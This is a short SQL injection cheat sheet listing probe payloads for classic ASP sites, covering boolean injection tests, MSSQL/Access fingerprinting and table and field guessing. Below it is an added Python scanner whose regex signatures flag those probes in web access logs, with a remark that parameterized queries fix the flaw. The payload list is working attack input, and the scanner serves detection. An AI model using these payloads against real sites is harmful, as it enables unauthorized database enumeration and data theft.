1. Check whether injection is possible: ;and 1=1 ;and 1=2
2. Preliminary check for whether the backend is MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [query condition] and ''='
4. When a search parameter is not filtered: 'and [query condition] and '%25'='
5. Identify the database system:
;and (select count(*) from sysobjects)>0 (MSSQL)
;and (select count(*) from msysobjects)>0 (Access)
6. Guess the database: ;and (select Count(*) from [database name])>0
7. Guess the field: ;and (select Count([field name]) from [database name])>0
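
For spotting the probe shapes listed above in web server access logs, the following is an added example and not part of the original page. The combined log format, the rule names, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request target inside a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')

# One signature per probe shape in the list above; rule names are this example's own.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("mssql-user-probe", re.compile(r"\band\s+user\s*>\s*0", re.I)),
    ("string-tail", re.compile(r"'\s*and\b.*\band\s+'%?'\s*=\s*'", re.I)),
    ("catalog-probe", re.compile(
        r"select\s+count\s*\(.*?\)\s*from\s+(?:msysobjects|sysobjects)\b", re.I)),
    ("count-subquery", re.compile(r"\band\s*\(\s*select\s+count\s*\(", re.I)),
]

def classify(log_line):
    """Return the names of the rules matched by the request's query string."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    # Decode twice so singly and doubly percent-encoded probes look the same.
    for _ in range(2):
        query = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(query)]

def scan(lines):
    """Return (line number, matched rules) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample log lines (documentation addresses, made-up paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search.asp?q=salt+and+pepper HTTP/1.1" 200 840',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12;and%201=2 HTTP/1.1" 200 97',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12;and%20user%3E0 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12;and%20(select%20count(*)%20from%20msysobjects)%3E0 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.asp?q=abc%27%20and%201=1%20and%20%27%25%27=%27 HTTP/1.1" 200 840',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```

Signature matching of this kind only flags the request for review; the underlying fix is to pass the parameter to the database through a parameterized query.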